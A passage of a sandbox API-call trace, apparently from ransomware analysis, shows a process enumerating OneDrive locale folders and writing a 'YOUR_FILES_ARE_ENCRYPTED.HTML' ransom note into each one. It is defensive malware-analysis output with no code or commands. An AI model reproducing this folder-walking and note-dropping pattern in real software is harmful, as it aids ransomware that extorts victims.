cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.772] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.772] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nn-no\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.772] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.772] lstrlenW (lpString=".mui") returned 4 [0113.772] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.772] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf646e6b2, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf646e6b2, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf98bc1f8, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x14cc0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.772] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0113.772] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nn-no\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.772] GetProcessHeap () returned 0x600000 [0113.772] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nn-no\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\nn-no\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.773] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.774] CloseHandle (hObject=0x334) returned 1 [0113.774] GetProcessHeap () returned 0x600000 [0113.774] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.774] GetProcessHeap () returned 0x600000 [0113.774] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.775] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa32a6a5, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfa32a6a5, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xfa32a6a5, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="nso-za", cAlternateFileName="")) returned 1 [0113.775] StrStrIW (lpFirst="nso-za", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.775] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nso-za") returned 82 [0113.775] GetProcessHeap () returned 0x600000 [0113.775] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.776] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nso-za" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nso-za") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nso-za" [0113.776] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nso-za", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nso-za\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nso-za\\*" [0113.776] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nso-za\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa32a6a5, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfa32a6a5, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0x103e07d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.776] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa32a6a5, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xfa32a6a5, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0x103e07d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="..", cAlternateFileName="")) returned 1 [0113.776] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103e07d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x103e07d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2cda3a8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x16cc0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.776] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.776] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nso-za\\FileSync.LocalizedResources.dll.mui") returned 118 [0113.776] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.776] lstrlenW (lpString=".mui") returned 4 [0113.776] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.776] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103e07d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x103e07d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2cda3a8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x16cc0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.776] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.776] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nso-za\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0113.776] GetProcessHeap () returned 0x600000 [0113.776] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\nso-za\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\nso-za\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.777] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.778] CloseHandle (hObject=0x334) returned 1 [0113.778] GetProcessHeap () returned 0x600000 [0113.778] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.778] GetProcessHeap () returned 0x600000 [0113.778] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.778] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849bc788, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x849bc788, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3150e345, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7718c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="OneDriveSetup.exe", cAlternateFileName="ONEDRI~1.EXE")) returned 1 [0113.778] StrStrIW (lpFirst="OneDriveSetup.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.778] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\OneDriveSetup.exe") returned 93 [0113.778] PathFindExtensionW (pszPath="OneDriveSetup.exe") returned=".exe" [0113.778] lstrlenW (lpString=".exe") returned 4 [0113.778] PathFindExtensionW (pszPath="OneDriveSetup.exe") returned=".exe" [0113.778] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2ea3f14, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2ea3f14, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2ea3f14, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="or-in", cAlternateFileName="")) returned 1 [0113.778] StrStrIW (lpFirst="or-in", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.779] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\or-in") returned 81 [0113.779] GetProcessHeap () returned 0x600000 [0113.779] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.779] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\or-in" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\or-in") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\or-in" [0113.779] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\or-in", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\or-in\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\or-in\\*" [0113.779] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\or-in\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2ea3f14, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2ea3f14, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7d77b98, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.779] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2ea3f14, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2ea3f14, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7d77b98, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="..", cAlternateFileName="")) returned 1 [0113.779] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d77b98, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7d77b98, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x832177f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.779] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.779] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\or-in\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.779] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.779] lstrlenW (lpString=".mui") returned 4 [0113.779] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.779] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d77b98, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7d77b98, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x832177f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.779] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.780] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\or-in\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.780] GetProcessHeap () returned 0x600000 [0113.780] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\or-in\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\or-in\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.780] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.781] CloseHandle (hObject=0x334) returned 1 [0113.781] GetProcessHeap () returned 0x600000 [0113.781] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.781] GetProcessHeap () returned 0x600000 [0113.781] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.781] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x86b4e06, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x86b4e06, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x86b4e06, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pa", cAlternateFileName="")) returned 1 [0113.781] StrStrIW (lpFirst="pa", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.781] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa") returned 78 [0113.781] GetProcessHeap () returned 0x600000 [0113.781] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.781] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa" [0113.781] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa\\*" [0113.781] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x86b4e06, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x86b4e06, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xabcf838, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.782] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x86b4e06, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x86b4e06, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xabcf838, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="..", cAlternateFileName="")) returned 1 [0113.782] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabcf838, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xabcf838, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xb5f1603, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.782] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.782] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.782] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.782] lstrlenW (lpString=".mui") returned 4 [0113.782] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.782] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabcf838, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xabcf838, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xb5f1603, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.782] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.782] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.782] GetProcessHeap () returned 0x600000 [0113.782] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\pa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.783] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.783] CloseHandle (hObject=0x334) returned 1 [0113.784] GetProcessHeap () returned 0x600000 [0113.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.784] GetProcessHeap () returned 0x600000 [0113.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.784] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9d14cf, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xb9d14cf, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xb9d14cf, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pa-arab", cAlternateFileName="")) returned 1 [0113.784] StrStrIW (lpFirst="pa-arab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.784] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab") returned 83 [0113.784] GetProcessHeap () returned 0x600000 [0113.784] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.785] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab" [0113.785] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab\\*" [0113.785] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9d14cf, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xb9d14cf, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xf3c8687, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, 